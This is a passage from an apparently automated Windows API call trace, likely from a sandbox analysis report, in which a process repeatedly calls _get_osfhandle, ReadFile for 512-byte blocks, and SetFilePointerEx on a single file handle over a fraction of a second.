(_FileHandle=4) returned 0x54 [0096.355] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.355] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.355] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.355] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.574] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.574] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.574] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.574] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.574] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.574] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.575] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.575] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.575] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.575] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.575] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.575] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.575] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.575] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.575] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.575] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.575] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.575] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.575] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.575] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.575] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.575] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.575] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.576] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.576] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.576] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.576] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.576] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.576] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.576] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.576] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.576] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.576] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.576] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.576] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.576] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.576] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.576] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.577] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.577] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.577] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.577] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.577] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.577] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.577] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.577] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.577] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.577] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.577] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.577] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.577] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.577] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.577] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.577] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.578] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.578] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.578] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.578] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.578] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.578] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.578] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.578] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.578] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.578] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.578] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.578] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.578] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.578] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.578] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.578] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.578] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.578] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.579] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.579] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.579] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.579] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.579] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.579] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.579] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.579] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.579] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.579] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.579] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.579] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.579] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.579] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.579] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.579] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.580] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.580] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.580] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.580] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.580] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.580] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.580] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.580] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.580] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.580] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.580] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.580] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.580] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.580] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.580] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.580] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.580] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.581] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.581] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.581] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.581] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.581] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.581] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.581] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.581] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.581] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.581] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.581] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.581] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.581] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.581] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.581] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.581] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.581] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.581] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.582] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.582] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.582] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.582] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.582] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.582] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.582] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.582] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.582] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.582] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.582] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.582] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.582] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.582] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.582] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.582] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.582] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.582] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.583] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.583] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.583] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.583] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.583] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.583] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.583] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.583] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.583] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.583] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.583] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.583] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.583] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.583] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.583] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.583] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.583] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.584] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.584] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.584] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.584] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.584] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 